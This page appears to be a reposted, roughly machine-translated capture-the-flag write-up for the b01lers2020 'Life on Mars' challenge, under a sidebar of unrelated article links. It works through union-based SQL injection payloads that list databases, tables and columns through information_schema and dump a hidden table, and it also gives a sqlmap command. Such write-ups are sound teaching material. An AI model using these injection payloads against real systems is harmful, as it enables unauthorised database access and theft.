当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
[b01lers2020]Life on Mars

A general look at the points is not important, f12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
strong>, click on different titles, the content of amazonis_planitia will also change with it

Attempt to enter the page it appears on this page
![]()

Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho

Check the library: /query?search=amazonis_planitia union select version(),database()

Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special 
Use the sqlmap tool to scan it
sqlmap download: sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases

I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'

Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

This is the end, let's spread the flowers
边栏推荐
猜你喜欢
随机推荐
DO280管理和监控OpenShift平台--资源限制
XSS线上靶场---Warmups
21天打卡挑战学习MySQL—Day第一周 第一篇
CAS:1797415-74-7_TAMRA-Azide-PEG-Biotin
L2-041 插松枝
472. Concatenated Words
mysql如何将表结构导出到excel
for循环练习题
易基因|RNA m5C甲基化测序(RNA-BS)技术介绍
CAS:1620523-64-9_Azide-SS-biotin_biotin-disulfide-azide
382. Linked List Random Node
A. Color the Picture- Codeforces Round #810 (Div. 1)
如何基于WPF写一款数据库文档管理工具(二)
[3D检测系列-PV-RCNN] PV-RCNN论文详解、PV-RCNN代码复现、包含官网PV-RCNN预训练权重及报错问题
软件测试人员必备的60个测试工具清单,建议收藏一波~
FVCOM三维水动力、水交换、溢油物质扩散及输运数值模拟丨FVCOM模型流域、海洋水环境数值模拟方法
【刷题篇】二叉树的右视图
【云原生实用技巧】使用 skopeo 批量同步 helm chart 依赖镜像
Go开发工具GoLand V2022.2 来了——Go 工作区重大升级
Pay from 0 to 1


![[N1CTF 2018]eating_cms](/img/09/3599d889d9007eb45c6eab3043f0c4.png)





